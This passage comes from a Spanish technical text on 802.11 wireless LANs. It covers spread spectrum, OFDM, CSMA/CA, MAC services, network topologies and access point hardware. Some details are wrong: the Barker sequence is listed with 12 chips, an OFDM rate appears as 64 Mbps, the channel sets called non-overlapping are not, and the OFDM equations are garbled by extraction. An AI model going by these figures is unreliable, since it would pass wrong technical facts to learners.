frecuencia se determina según una secuencia pseudoaleatoria almacenada en unas tablas, y
que tanto el emisor y el receptor deben conocer. Si se mantiene la sincronización en los
saltos de frecuencias se consigue que, aunque en el tiempo se cambie de canal físico, a
nivel lógico se mantiene un solo canal por el que se realiza la comunicación. Esta técnica
también utiliza la zona de los 2.4GHz, la cual organiza en 79 canales con un ancho de
banda de 1MHz cada uno. El número de saltos por segundo es regulado por cada país, así,
por ejemplo, Estados Unidos fija una tasa mínima de saltas de 2'5 por segundo. (1sg/2'5)=
400ms.

Una transmisión en espectro expandido ofrece 3 ventajas principales:

1. Las señales en espectro expandido son altamente resistentes al ruido y a la


interferencia.

2. Las señales en espectro expandido son difíciles de interceptar. Una transmisión de


este tipo suena como un ruido de corta duración, o como un incremento en el ruido
en cualquier receptor, excepto para el que esté usando la secuencia que fue usada
por el transmisor.

REDES WLAN CON ACCESS POINT 61


3. Transmisiones en espectro expandido pueden compartir una banda de frecuencia
con muchos tipos de transmisiones convencionales con mínima interferencia.

Su principal desventaja es su bajo ancho de banda

3.11.2 DSSS

En esta técnica se genera un patrón de bits redundante para cada uno de los bits que
componen la señal. Cuanto mayor sea este patrón de bits, mayor será la resistencia de la
señal a las interferencias. El estándar IEEE 802.11 recomienda un tamaño de 11 bits, pero
el óptimo es de 100. En recepción es necesario realizar el proceso inverso para obtener la
información original. La secuencia de bits utilizada para modular los bits se conoce como
secuencia de Barker (también llamado código de dispersión o pseudorruido). Es una
secuencia rápida diseñada para que aparezca aproximadamente la misma cantidad de 1 que
de 0. Un ejemplo de esta secuencia es el siguiente. +1-1+1+1-1+1+1+1-1-1-1-1 Solo los
receptores a los que el emisor haya enviado previamente la secuencia podrán recomponer la
señal original.

Además, al sustituir cada bit de datos a transmitir, por una secuencia de 11 bits equivalente,
aunque parte de la señal de transmisión se vea afectada por interferencias, el receptor aún
puede reconstruir fácilmente la información a partir de la señal recibida. Esta secuencia
proporciona 10.4dB de aumento del proceso, el cual reúne los requisitos mínimos para las
reglas fijadas por la FCC.

Una vez aplicada secuencia de Barker, el estándar IEEE 802.11 ha definido dos tipos de
modulación para la técnica de espectro ensanchado por secuencia directa (DSSS), la
modulación DBPSK (Differential Binary Phase Shift Keying) y la modulación DQPSK
(Differential Quadrature Phase Shift Keying), que proporcionan una velocidad de
transferencia de 1 y 2 Mbps respectivamente.

REDES WLAN CON ACCESS POINT 62


Recientemente el IEEE ha revisado este estándar, y en esta revisión, conocida como
802.11b, además de otras mejoras en seguridad, aumenta esta velocidad hasta los 11Mbps,
lo que incrementa notablemente el rendimiento de este tipo de redes. Las frecuencias
vienen comprendidas entre 2.412 y 2.484GHz. Estas son divididas en canales (puede variar
según legislación de cada país).

Canal 01: 2.412 GHz Canal 02: 2.417 GHz Canal 03: 2.422 GHz Canal 04: 2.427 GHz
Canal 05: 2.432 GHz Canal 06: 2.437 GHz Canal 07: 2.442 GHz Canal 08: 2.447 GHz
Canal 09: 2.452 GHz Canal 10: 2.457 GHz Canal 11: 2.462 GHz Canal 12: 2.467 GHz
Canal 13: 2.472 GHz Canal 14: 2.484 GHz

Para cada canal es necesario un ancho de banda de unos 22 MHz para poder transmitir la
información, por lo que se produce un inevitable solapamiento de los canales próximos Si
tenemos que poner algunos puntos de acceso cercanos inevitablemente, deberíamos
separarlos lo suficiente siendo recomendable usar canales que no se solapen. 2, 7 y 12 otra
posibilidad sería 3, 8 y 13 otra 4, 9 y 14 por ultimo 1, 8 y 14. La técnica de DSSS podría
compararse con una multiplexación en frecuencia, como se muestra en la Figura 3.2.

Figura 3.3 FHSS y DSSS

REDES WLAN CON ACCESS POINT 63


3.11.3 OFDM

OFDM (Orthogonal Frequency Division Multiplexing, ‘Multiplexacion Ortogonal por


división de frecuencias’) es la técnica de gestión de frecuencias utilizada por IEEE 802.11a.
Esta técnica divide el ancho de banda en subcanales más pequeños que operan en paralelo.

De esta forma se consigue llegar a velocidades de transmisión de hasta 54 Mbps (100 Mbps
con soluciones propietarias). La técnica OFDM fue patentada por Bell Labsen 1970 y está
basada en un proceso matemático llamado FFT (Fast Fourier Transform, ‘Transformada
rápida de fourier’).

OFDM divide la frecuencia portadora en 52 subportadoras solapadas. 48 de estas


subportadoras son utilizadas para transmitir datos y otras cuatro para poder alinear las
frecuencias en el receptor. Este sistema consigue un uso eficiente del espectro
radioeléctrico. OFDM puede transmitir datos a distintas técnicas de modulación en cada
una de ellas. Las velocidades normalizadas que admite OFDM son 6, 9, 12, 18, 24, 36,48 y
64 Mbps.

Una de las ventajas de OFDM es que consigue una alta resistencia a las interferencias
producidas por las ondas reflejadas en los objetos del entorno (eco o multipath). Estas
ondas llegan al receptor con distinta amplitud y a distinto tiempo que la señal principal
produciendo interferencias. Estas interferencias son un problema a velocidades superiores a
4 Mbps; por este motivo, se utilizan técnicas (como OFDM) que mitiguen este efecto.

Debe existir una relación matemática precisa entre las frecuencias de las subportadoras, de
tal forma que no exista interferencia entre estas debido a los traslapes. A esta relación se le
da el nombre de ortogonalidad. En este caso las subportadoras que son ortogonales pueden
ser distinguidas una de otra en el receptor.

REDES WLAN CON ACCESS POINT 64


Generación de las subportadoras. La señal OFDM consiste en una serie de símbolos
OFDM, resultado de la suma de las subportadoras, las cuales son moduladas utilizando la
técnica de modulación PSK (por desplazamiento de fase) o QAM (modulación de amplitud
en cuadratura) Matemáticamente un símbolo OFDM puede ser escrito como sigue:

𝑁𝑁𝑠𝑠 −1 𝑖𝑖+0.5
𝑆𝑆(𝑡𝑡) = 𝑅𝑅𝑒𝑒 �∑ 𝑁𝑁 𝑑𝑑 𝑁𝑁 𝑠𝑠 𝑒𝑒𝑒𝑒𝑒𝑒 �𝑗𝑗2𝜋𝜋 �𝑓𝑓𝑐𝑐 − � (𝑡𝑡 − 𝑡𝑡𝑠𝑠 )�� , 𝑡𝑡𝑠𝑠 ≤ 𝑡𝑡 ≤ 𝑡𝑡𝑠𝑠 +T (1)
𝑖𝑖=− 𝑠𝑠 𝑖𝑖+ 2 𝑇𝑇
2

𝑠𝑠(𝑡𝑡) = 0, 𝑡𝑡 < 𝑡𝑡𝑠𝑠 ∧ 𝑡𝑡 > 𝑡𝑡𝑠𝑠 + 𝑇𝑇 (2)

Donde se considera di como los símbolos complejos (QAM o PSK), Ns el número de


subportadoras, T como la duración del símbolo, fc la frecuencia de portadora y ts es el
tiempo de inicio de un símbolo OFDM. Comúnmente la notación en banda base compleja
equivalente es utilizada, como se muestra en la ecuación (3).

𝑁𝑁 𝑆𝑆
−1 1
𝑠𝑠(𝑡𝑡) = ∑ 2 𝑁𝑁 𝑑𝑑 𝑁𝑁 𝑠𝑠 𝑒𝑒𝑒𝑒𝑒𝑒 �𝑗𝑗2𝜋𝜋 (𝑡𝑡 − 𝑡𝑡𝑠𝑠 )�, 𝑡𝑡𝑠𝑠 ≤ 𝑡𝑡 ≤ 𝑡𝑡𝑠𝑠 +T (3)
𝑖𝑖=− 2𝑠𝑠 𝑖𝑖+ 2 𝑇𝑇

𝑠𝑠(𝑡𝑡) = 0, 𝑡𝑡 < 𝑡𝑡𝑠𝑠 ∧ 𝑡𝑡 > 𝑡𝑡𝑠𝑠 + 𝑇𝑇 (4)

En esta representación, las partes real e imaginaria corresponden a los componentes de fase
y cuadratura de la señal OFDM las cuales tienen que ser multiplicadas por un coseno y seno
de frecuencia portadora deseada para producir la señal OFDM final. En la Figura 3.4 se
muestra el diagrama a bloques de la operación de un modulador OFDM. La transformada
inversa rápida de Fourier IFFT es una herramienta computacional que facilita el análisis de
señales, ya que es una técnica para el cálculo eficiente de la transformada discreta inversa
de Fourier. De ahí que la IDFT puede implementarse muy eficientemente por medio de la
IFFT, reduciendo en gran medida la cantidad de cálculos. Durante los últimos años, la
aceptación de OFDM como tecnología de base para el 802.16a que es un estándar de IEEE
para redes de área metropolitana inalámbrica que puede proveer extensión inalámbrica para
acceso de última milla de banda ancha en instalaciones de cable y DSL.

REDES WLAN CON ACCESS POINT 65


El mismo cubre el rango de frecuencias de 2 a 11 GHz y alcanza hasta 50 kilómetros
lineales, brindando conectividad de banda ancha inalámbrica sin necesidad de que exista
una línea directa de visión a la estación de base. La velocidad de transmisión de datos
puede llegar a 70 Mbps. Una estación de base típica puede albergar hasta seis sectores, la
calidad del servicio está integrada dentro del MAC, permitiendo la diferenciación de los
niveles de servicio.

El origen de OFDM es de la década de 50/60 en aplicaciones de uso militar que trabaja


dividiendo el espectro disponible en múltiples subportadoras. La transmisión sin línea de
vista ocurre cuando entre el receptor y el transmisor existen reflexiones o absorciones de la
señal lo que resulta en una degradación de la señal lo que resulta en una degradación de la
señal lo que resulta en una degradación de la señal recibida lo que se manifiesta por medio
de los siguientes efectos: atenuación plana, atenuación selectiva en frecuencia o
interferencia inter-símbolo. Estos efectos se mantienen bajo control con el W-OFDM que
es una tecnología propietaria de WI LAN que recibió, en 1994, la patente 5.228.222 para
comunicaciones inalámbricas de dos vías y banda ancha OFDM (WOFDM).

Esta patente es la base para los estándares 802.11a, 802.11g, 802.11a R/A, 802.16a
estándares para HiperMAN. Los sistemas W-OFDM incorporan además estimación de
canal prefijos cíclicos y códigos Reed-Solomon de corrección de errores. La creciente
disponibilidad en el mercado de tarjetas de radio y Access points con tecnología 802.11a es
la más clara señal de la existencia de otra poderosa tendencia en soluciones para las redes
conocidas como LAN.

Las tecnologías 802.11a y 802.11b definen la capa física diferente de cada una, los radios
802.11b transmiten a 2.4 GHz y envían datos a tasas tan altas como 11 Mbps usando
modulación DSSS (Espectro Disperso de secuencia directa); mientras que los radios
802.11a transmiten a 5 GHz y envían datos a tasas de de hasta 54 Mbps usando OFDM.

REDES WLAN CON ACCESS POINT 66


OFDM es una tecnología de modulación digital, una forma especial de modulación multi-
carrier considerada la piedra angular de la próxima generación de productos y servicios de
radio frecuencia de alta velocidad para uso tanto personal como corporativo. La técnica de
aspecto disperso de OFDM distribuye los datos en un gran número de carriers que están
espaciados entre sí en distintas frecuencias precisas. Ese espaciado evita que los
demoduladores vean frecuencias distintas a las suyas propias.

La modulación por división ortogonal de frecuencia, en ingles Orthogonal Frecuency


Division Multiplexing (OFDM), mostrada en la Figura 3.3, también llamada modulación
por multitono discreto, en ingles Discreet Multitone Modulation que consiste en enviar la
información modulando en QAM o PSK un conjunto de portadoras de diferente frecuencia.

Figura 3.4 Modulación OFDM

3.12 MODULACIÓN DE LA SEÑAL

Para poder transmitir la señal de radio, hace falta definir un método de difusión de la señal
y un método de modulación de la señal. La modulación consiste en modificar una señal
pura de radio para incorporarle la información a transmitir.

REDES WLAN CON ACCESS POINT 67


La señal base a modular recibe el nombre de portadora (carrier en ingles). Lo que se le
cambia a la portadora para modularla es su amplitud, frecuencia, fase o una combinación de
estas. Mientras mayor es la velocidad de transmisión, más complejo es el sistema de
modulación. Las técnicas de modulación. Las técnicas de modulación utilizadas en IEEE
802.11 son las siguientes:

• BPSK (Binary Phase-Shifi Keying, ‘Modulación Binaria por Salto de Fase’)

• QPSK (Quadrature Phase-Shifi Keying, ‘Modulación por Salto de Fase en


Cuadratura’)

• GFSP (Gaussian Frecuency-Shifi Keying, ‘Modulación Gausiana por Salto de


Frecuencia’)

• CCK (Complementary Code Keying, ‘Modulación de Código Complementario’)

• Una vez emitida la señal modulada, el receptor tiene que recibir la señal, sincronizar
el código de difusión y demodular la información. Los sistemas FHSS son más
complicados de sincronizar que los sistemas DSSS. En el primer caso hay que
sincronizar tiempo y frecuencia, y en el segundo, solo el tiempo.

3.13 CARACTERÍSTICAS DE LA MODULACIÓN OFDM.

La modulación OFDM es muy robusta frente al multiproyecto, que es muy habitual en los
canales de radiodifusión, frente a los desvanecimientos selectivos en frecuencia y frente a
las interferencias de RF. Debido a las características de esta modulación, las distintas
señales con distintos retardos y amplitudes que llegan al receptor contribuyen
positivamente a la recepción, por lo que existe la posibilidad de crear redes de radiodifusión
de frecuencia única sin que existan problemas de interferencia.

REDES WLAN CON ACCESS POINT 68


Entre los sistemas que usan la modulación OFDM destacan:

La televisión digital terrestre DVB-T, también conocida como TDT. La radio digital DAB.
La radio digital de baja frecuencia DRM. El protocolo de enlace XDSL. El protocolo de red
de área local IEEE 802.11a/g, también conocido como wireless LAN. El sistema de
transmisión inalámbrica de datos WiMAX. El sistema de transmisión de datos por líneas
eléctricas, en ingles Power Line Communications PLC. OFDM tiene una alta frecuencia de
espectro, resistencia a la interface RF y menor distorsión multi-ruta. Actualmente OFDM
no solo se usa en las redes inalámbricas LAN 802.11a, sino en las 802.11g, en
comunicaciones de alta velocidad por vía telefónica como las ADSL y en difusión de
señales de televisión digital terrestre en Europa, Japón y Australia.

W-OFDM Wideband Orthogonal Frecuency Division Multiplexing: Esquema de


transmisión que codifica la información en múltiples radio frecuencias simultáneamente.
Dando como resultado, mayor seguridad, mayor velocidad. Esto la convierte en el esquema
más eficiente en el uso del ancho de banda en la industria. W-OFDM es la base del estándar
IEEE 802.11a que a su vez es la base para el estándar propuesto IEEE 802.16

Características:

• Ancho de banda: 30 Mbps


• Altamente inmune a interferencias
• Punto a punto, 8 a 10 km
• Multi-punto, 3 a 5 km
• Próximamente: 45 Mbps, 90 Mbps, 155 Mbps

El reto de todos los días para la industria es lograr mayores velocidades de transmisión en
las redes de datos/internet. Una propuesta es el esquema de transmisión W-OFDM (Wide-
band Orthogonal Frecuency Division Multiplexing), este método como otros codifica los
datos dentro de una señal de radio frecuencia (RF).

REDES WLAN CON ACCESS POINT 69


Transmisiones convencionales como AM/FM envían solamente una señal a la vez sobre
una frecuencia de radio. Mientras que OFDM envía una señal de alta velocidad
concurrentemente sobre frecuencias diferentes. Esto nos permite hacer uso muy eficiente
del ancho de banda y tener una comunicación robusta al enfrentar ruido y reflejos de
señales. La tecnología OFDM parte una señal de alta velocidad en decenas o centenas de
señales de menor velocidad, que son trasmitidas en paralelo. Esto crea un sistema altamente
tolerante al ruido, al mismo tiempo es muy eficiente en el uso del ancho de banda y por lo
tanto permite una amplia cobertura de área punto a punto y multipunto.

Actualmente existen equipos con la capacidad de transmitir desde 1.5 Mbps hasta 30 Mbps
en 25 MHz de ancho de banda y pronto se estarán produciendo equipos que superan
velocidades de 100 Mbps. Adicionalmente a la velocidad, se cuenta con opciones de
seguridad que hacen virtualmente imposible descifrar la señal que se transmite.

3.14 MAC CONTROL DE ACCESO AL MEDIO.

La capa MAC define los procedimientos que hacen posible que los distintos dispositivos
compartan el uso de este espectro radioeléctrico. Mientras que las distintas versiones del
estándar 802.11 utilizan distintos sistemas para difundir su señal (su capa física distinta), la
capa MAC es la misma para todas ellas. Es interesante también hecho de que la capa MAC
sea muy similar a la utilizada por la red Ethernet. Ambas utilizan la técnica conocida como
CSMA, no obstante, la versión cableada (Ethernet) utiliza la tecnología CD, mientras que la
versión inalámbrica utiliza la tecnología CA (Collision Avoidance, ‘Evitación de
Colisión’). Una colisión se produce cuando dos terminales intentan hacer uso del medio
físico simultáneamente. La tecnología CD detecta que se ha producido una colisión y
retransmite los datos, mientras que la tecnología CA dispone de procedimiento para evitar
que se produzcan colisiones. La razón de que haya dos sistemas es que, cuando el medio es
un cable, la terminal puede transmitir y recibir el mismo tiempo, por lo que puede detectar
las colisiones.

REDES WLAN CON ACCESS POINT 70


Por el contrario, en el medio radio eléctrico una terminal no puede transmitir y recibir el
mismo tiempo por el mismo canal (la transmisión dejaría opaca a la recepción), por lo que,
al no poder detectar las posibilidades colisiones, no hay más remedio que disponer de una
técnica que las evite.

3.14.1 EVITAR COLISIONES.

Entre la capa MAC y la capa física se intercambian tres tipos de paquetes de datos: de
control, de gestión y de información.

MAC tiene dos funciones distintas para coordinar la transferencia de datos.

• PCF (Point Coordination Function, ‘Función de Coordinación del Punto’) facilita un


sistema para poder transmitir el trafico que es sensible a los retardos y que requiere
un tratamiento especial evitando las demoras. A la estación que hace uso de esta
función se le llama coordinador e3l punto. PC (Point Coordinator). El PC emite una
señal guía con la duración del periodo de tiempo que necesita disponer del medio.
Las estaciones que reciben esta señal no emiten durante ese tiempo.

• DCF (Distributed Coordination Function, ‘Función de Coordinación Distribuida’)


facilita un sistema que permite compartir el medio físico (radioeléctrico, infrarrojos,
etc.) entre todas las estaciones negociar el acceso al medio físico, así como los
mecanismos que aseguran la entrega de los datos a las estaciones. A través de DCF
se transmiten los datos.

La función DCF se encuentra con un problema y es que una de las diferencias de


los medios cableados frente a los inalámbricos es que en estos últimos es mucho más
complicado detectar las colisiones. Dos estaciones que no se ven entre sí pueden iniciar una
comunicación simultáneamente sin percatarse de la colisión. DCF dispone de una función
para impedirla colisión que evita este problema.

REDES WLAN CON ACCESS POINT 71


Los mecanismos CSMA/CA de detección de la colisión consiste en comprobar si el medio
esta en uso antes de empezar a transmitir. Si el medio esta en uso, se espera un tiempo antes
de volver a hacer la comprobación. El tiempo que espera cada estación tiene una duración
aleatoria (generada por cada estación entre un tiempo mínimo y un máximo) para evitar que
haya colisiones sucesivas indefinidas. La función DCF contempla un mecanismo físico y
otro lógico de detección de colisión. Al mecanismo físico se le conoce como CCA (Clear
Channel Assessment, ‘Valoración de la disponibilidad del Canal’). Por ejemplo, cuando
hablamos de un medio radioeléctrico, este mecanismo puede consistir en comprobar si el
medio existe cualquier señal DSSS o cualquier otra señal con un nivel de energía superior a
un umbral.

El mecanismo físico de detección de colisión es muy eficiente, pero no es eficaz cuando


dos estaciones de una misma red que no se ven entre ellas emiten al mismo tiempo. Esto se
conoce con el nombre de problema del nodo oculto. Para evitar estos casos, se dispone del
sistema lógico de detección de colisión. Este sistema consiste en intercambiar la
información del uso del medio a través de tramas de control. A estas tramas de control se
les conoce como RTS (Request to Send, ‘Solicitud para Enviar’) y CTS (Clear to Send,
‘Listo para enviar’). Como esta información de control añade más datos de control a la
transmisión en detrimento de los datos de información (baja el rendimiento del protocolo),
en aquellos casos en los que se disponga de un medio físico con poca probabilidad de
colisiones se puede deshabilitar el mecanismo de detección de colisión, o habilitarlo
exclusivamente para aquellos paquetes de datos que tengan un tamaño superior a uno
determinado.

Cuando esta estación de una red va a transmitir información, primero envía una trama RTS
al punto de acceso donde facilita información del destinatario de la transmisión, el
remitente y el tiempo que ocupara dicha transmisión. El punto de acceso responde con una
trama CTS que reciben todas las estaciones que están en el área de cobertura del punto de
acceso.

REDES WLAN CON ACCESS POINT 72


En esta trama CTS se incluye el tiempo de ocupación del medio; por tanto las estaciones
saben el tiempo que estará ocupado el medio y no intentaran hacer ninguna transmisión
hasta que dicho tiempo no haya pasado. Por cierto cuando el destinatario ha recibido toda la
información, emite una trama ACK (Acknowledgment, ‘Conocimiento’) para indicarle el
emisor que todo está bien. Si el emisor no recibe la trama ACK que espera, aguardara un
tiempo antes de dar transmisión por errónea y volver hacer el envió.

3.15 LOS SERVICIOS.

Como hemos visto, las redes inalámbricas IEEE 802.11 están formadas por terminales y
puntos de acceso y ambos reciben el nombre de estaciones. La capa MAC define como las
estaciones acceden al medio mediante lo que se llama servicios de estaciones.

De la misma forma, define como los puntos de acceso gestionan la comunicación mediante
lo que se llama servicios de distribución.

Los servicios de estación de la capa MAC son las siguientes:

• Autentificación. Comprueba la identidad de una estación y la autoriza para


asociarse. En una red cableada lo que identifica a una terminal como parte de la red
es el hecho de estar conectado físicamente a ella. En una red inalámbrica no existe
la conexión física, por lo que, para saber si una terminal forma o no parte de la red,
hay que comprobar su identidad antes de autorizar su asociación con el resto de la
red.

• Desautentificación. Cancela una autenticación existente. Este servicio da por


concluida la conexión cuando una estación pretende desconectarse de la red.

REDES WLAN CON ACCESS POINT 73


• Privacidad. Evita el acceso no autorizado a los datos gracias al uso del algoritmo
WEP (Wired Equivalency Protocol, ‘Protocolo de equivalencia con red cableada’).
Este algoritmo pretende emular el nivel de seguridad que se tiene en las redes
cableadas.

• Entrega de datos. Facilita la transferencia de datos entre estaciones.

Por su lado, los servicios de distribución son estos otros:

• Asociación. Para que una terminal pueda comunicarse con otras terminales a través
de un punto de acceso, debe primero estar asociado a dicho punto de acceso.
Asociación significa asignación del terminal al punto de acceso haciendo que este
sea el responsable de la distribución de datos, y desde dicha terminal. En las redes
con más de un punto de acceso, una terminal solo puede estar asociada a un punto
de acceso simultáneamente.

• Desasociación: Cancela una asociación existente, bien porque la terminal sale del
área de cobertura del punto de acceso, o porque el punto de acceso termina la
conexión.

• Reasociacion: Transfiere una asociación entre dos puntos de acceso. Cuando una
terminal se mueve del área de cobertura de un punto de acceso a la de otro, su
asociación pasa a depender de este ultimo.

• Distribución: Cuando se transfieren datos de una terminal a otra, el servicio de


distribución se asegura de que los datos alcanzan su destino.

• Integración: Facilita la transferencia de datos entre la red inalámbrica IEEE 802.11


y cualquier otra red (por ejemplo, internet o Ethernet).

REDES WLAN CON ACCESS POINT 74


Los puntos de acceso utilizan tanto los servicios de estaciones como los servicios de
distribución, mientras que las terminales solo utilizan los servicios de estaciones.

3.16 LA GESTIÓN.

Tanto la capa física como la capa MAC están divididas en capacidades de gestión y de
transferencia de datos .lo que se conoce como PLME (PHY Layer Management Enity,
‘Entidad de gestión de la capa física) es quien se encarga de la gestión de la capa física,
mientras que lo que se conoce como MLME (MAC Layer Management Enity, ‘Entidad de
gestión de la capa MAC’) es quien se encarga de la gestión de la capa MAC, PLME y
MLME intercambian información a través de MIB.

3.17 EL FLUJO DE DATOS.

Los datos que se van a transmitir por el medio de radio eléctrico proceden de las capas
superiores (formato IP) y se pasan a la capa LLC (Logical Link Control, ‘Control Lógico de
Enlace’). La capa LLC le pasa estos datos a la capa MA, quien a su vez, se los pasa a la
capa física para su emisión. Los paquetes de datos que se intercambian entre las capas LLC
y MAC se conocen como MSDU (MAC Service Data Unit, ‘ Unidad de datos del Servicio
MAC’), mientras que los paquetes de datos que se intercambian entre las capas MAC y
física reciben el nombre de MPDU (MAC protocol data unit, ‘Unidad de Datos del
protocolo MAC’). En la capa física, quien recibe estos datos es PLCP, quien es responsable
de convertir los datos MPDU a un formato compatible con el medio físico.

3.18 LA ESTRUCTURA DE RED.

La topología de una red es la arquitectura de la red, la estructura jerárquica que hace


posible la interconexión de los equipos. IEEE 802.11 y por tanto WiFi contempla tres
topologías distintas:

REDES WLAN CON ACCESS POINT 75


• IBSS (Independent Basic Service Set, ‘Conjunto de Servicios Básicos
Independientes’). Esta modalidad está pensada para permitir exclusivamente
comunicaciones directas entre las distintas terminales que forman la red. En este
caso no existe ninguna terminal principal que coordine el grupo, no existe punto de
acceso. Todas las comunicaciones son directas entre dos o más terminales del
grupo. A esta modalidad se le conoce también como ad hoc, independiente o de
igual a igual peer-to-peer).

• BSS (Basic Service Set, ‘Conjunto de Servicios Básicos’). En esta modalidad se


añade un equipo llamado punto de acceso (AP o Access Point) que realiza las
funciones de coordinación centralizada de la comunicación entre las distintas
terminales de la red. Los puntos de acceso tienen funciones de buffer (memoria de
almacenamiento intermedio) y la gateway (pasarela) con otras redes. A los equipos
que hacen de pasarelas con otras redes externas se les conoce como portales. A la
modalidad BSS también se le conoce como modo infraestructura.

• ESS (Extended Service Set, ‘Conjunto de Servicios Extendido’). Esta modalidad


permite crear una red inalámbrica formada por más de un punto de access. De esta
forma se puede extender el área de cobertura de la red, quedando constituida por un
conjunto de celdas pegadas unas a otras. Una red ESS está formada por múltiples
redes BSS.

REDES WLAN CON ACCESS POINT 76


CAPÍTULO IV
PUNTOS DE ACCESO INALÁMBRICOS

INTRODUCCIÓN:

Comencemos dando una definición de Punto de Acceso Inalámbrico (Access Point), se


trata de un dispositivo inalámbrico que mediante sistema de radio frecuencia se encarga de
recibir información de diferentes estaciones móviles. Este dispositivo "capta" la
información de las estaciones y las transmite (esta vez, por medio de cables) a un servidor,
que puede ser único o formar parte de una red, cableada, más extensa. Su alcance
aproximado es de 100m.

Esta maravilla de la técnica surgida hace pocos años soluciona muchos problemas pues, al
evitarnos estar "atados" a un cable, nos permite movilidad, comodidad, estética, ahorros de
instalaciones, etc. El punto de acceso es el centro de las comunicaciones de la mayoría de
las redes inalámbricas. El punto de acceso no sólo es el medio de intercomunicación de
todas las terminales inalámbricas, sino que también es el puente de interconexión con la red
fija e Internet.

Aparte de lo anterior, cada equipo tiene sus propias características externas. Por ejemplo,
algo que diferencia claramente a unos puntos de acceso de otros es el número y tipo de
puertos exteriores que ofrece. Existen puntos de acceso que disponen hasta de un puerto de
impresora (con su servidor de impresión), mientras que otros se limitan a ofrecer una
conexión para red cableada o Internet.

REDES WLAN CON ACCESS POINT 77


Por otro lado, es habitual que los puntos de acceso se utilicen también como pasarela de
conexión con otras redes (por ejemplo, con Internet). Desde este punto de vista, es
importante que se tengan en cuenta dos cosas: la primera es que nos fijemos en las
características de router del punto de acceso: DHCP, NAT o propiedades de firewall son
características que nos ayudarán en la configuración y manejo de las comunicaciones con
Internet o con otras redes.

Por último, los equipos WiFi tienen la ventaja de que tienen la garantía de interfuncionar
sin problemas de acuerdo con la norma IEEE 802.11 b o la 802.11g. Esto es así, sin duda,
en relación con los adaptadores de red; sin embargo, existe cierta incompatibilidad en
relación con los puntos de acceso.

La incompatibilidad aparece a la hora de mantener en servicio una comunicación cuando un


usuario pasa del área de cobertura de un punto de acceso al de otro (a esto se le llama
roaming en inglés).

La incompatibilidad de un punto de acceso a otro no está completamente definida en el


estándar. Sin embargo, la señalización y el sondeo que se utilizan para buscar puntos de
acceso y un proceso de reasociación que permite a la estación asociarse a un punto de
acceso diferente, junto con protocolos específicos de otros fabricantes entre puntos de
acceso, proporcionan una transición fluida. La sincronización entre las estaciones de la red
se controla mediante las tramas de señalización periódicas enviadas por el punto de acceso.

Estas tramas contienen el valor de reloj del punto de acceso en el momento de la


transmisión, por lo que sirve para comprobar la evolución en la estación receptora. La
sincronización es necesaria por varias rabones relacionadas con los protocolos y esquemas
de modulación de las conexiones inalámbricas.

REDES WLAN CON ACCESS POINT 78


4.1 CARACTERÍSTICAS DE LOS PUNTOS DE ACCESO

Un único punto de acceso puede soportar un pequeño grupo de usuarios y puede funcionar
en un rango de al menos treinta metros y hasta varios cientos. Algunos fabricantes se han
preocupado incluso de darles una forma estilizada que se salga de la forma típica de caja.
Aunque la estética exterior de la caja pueda parecer un hecho sin importancia. Por otro
lado, a veces la estética es algo más que las apariencias. Unos puntos de acceso incluyen
accesorios útiles para poderlos soportar en la pared o en el techo, mientras que otros
carecen de este tipo de accesorios. Sus antenas son normalmente colocadas en alto pero
podría colocarse en cualquier lugar en que se obtenga la cobertura de radio deseada. En
cualquier caso, en su interior encontramos algunas similitudes de acuerdo a los
componentes básicos de cualquier Punto de Acceso.

• Un equipo de radiofrecuencia

El estándar 802.11b
Opera en la banda de los 2.4 GHz.
Alcanza una velocidad máxima de 11 Mbps.

El estándar 802.11a
Opera en la banda de los 5.0 GHz.
Alcanza una velocidad máxima de 54 Mbps.

El estándar 802.11g
Opera en la banda de los 2.4 GHz.
Alcanza una velocidad máxima de 54 Mbps.

• Una o dos antenas (que pueden o no apreciarse exteriormente)


• Un software de gestión de las comunicaciones
• Puertos para conectar el punto de acceso a Internet o a la red cableada.

REDES WLAN CON ACCESS POINT 79


Existen dos categorías de puntos de acceso:

• Puntos de accesos profesionales, diseñados para crear redes corporativas de


tamaño medio o grande. Éstos suelen ser los más caros, pero incluyen mejores
características (aunque sean particulares del fabricante), como son mejoras en la
seguridad y una más perfecta integración con el resto de equipos. Los líderes
de este tipo de equipamiento son Cisco, 3Com Agere/Orinoco (antiguamente
conocidos como Lucent) y Nokia.

• Puntos de acceso económicos, dirigidos a cubrir las necesidades de los usuarios de


pequeñas oficinas o del hogar. Estos puntos de acceso ofrecen exactamente los
mismos servicios que los anteriores, con la misma cobertura y las mismas
velocidades. La diferencia se nota cuando se dispone de un gran número de
usuarios. En estos casos, los puntos de acceso profesionales ofrecen mejores
resultados, eso sí, multiplicando el precio por cuatro o cinco. Los que más puntos
de acceso de tipo económico venden son Intel, 3Com, D-Link, Agere /Orinoco,
NetGear Proxim y Linksys.

4.2 LA RADIO

El objetivo principal de los puntos de acceso es comunicarse con las terminales vía radio.
Por tanto, lo principal de los puntos de acceso es su equipamiento de radio. Se utilizan
ondas de radio para llevar la información de un punto a otro sin necesidad de un medio
físico guiado.

Se utilizan ondas de radio. Al hablar de ondas de radio, nos referimos normalmente a ondas
portadoras de radio sobre las que se transporta la información (trasladando la energía a un
receptor remoto).

REDES WLAN CON ACCESS POINT 80


La transmisión de datos entre dos computadoras se realiza por medio de un proceso
conocido como modulación de la portadora. El aparato transmisor agrega datos a una onda
de radio (onda portadora). Esta onda, al llegar al receptor, es analizada por éste, el cual
separa los datos útiles de los inútiles.

Una onda portadora es una forma de onda que es modulada por una señal que se quiere
transmitir (señal moduladora). Esta onda portadora es de una frecuencia mucho más alta
(del espectro electromagnético), que la de la señal moduladora. De esta manera, se logra
transmitir más fácilmente la señal, y el alcance que se consigue es superior. Las ondas
portadoras son usadas cuando se transmiten señales de radio a un radiorreceptor. Tanto las
señales de modulación de amplitud (AM) como las de frecuencia modulada (FM) son
transmitidas con la ayuda de frecuencias portadoras.

4.3 LOS PUERTOS

Los puntos de acceso necesitan disponer de puertos para poderse conectar con una red local
cableada y con Internet. Para conseguir esto, los puntos de acceso suelen traer uno o más
puertos 10/100Base-T (RJ-45). No obstante, las posibilidades de conectividad de los puntos
de acceso no acaban aquí; dependiendo del modelo, nos podemos encontrar los siguientes
puertos:

• Un puerto especial para conectarse a un hub o switch de red de área local Ethernet
(uplinkport). Disponer internamente de un hub, por lo que ofrecen de dos a cuatro
puertos exteriores para conectarles los equipos de red Ethernet de que disponga el
usuario. Esto es ideal para el hogar o la pequeña oficina ya que evita la necesidad de
disponer de un hub o switch independiente. En cualquier caso, si se necesitase de
más de cuatro puertos, siempre se puede comprar otro hub y conectarlo al punto de
acceso para extender la red.

REDES WLAN CON ACCESS POINT 81


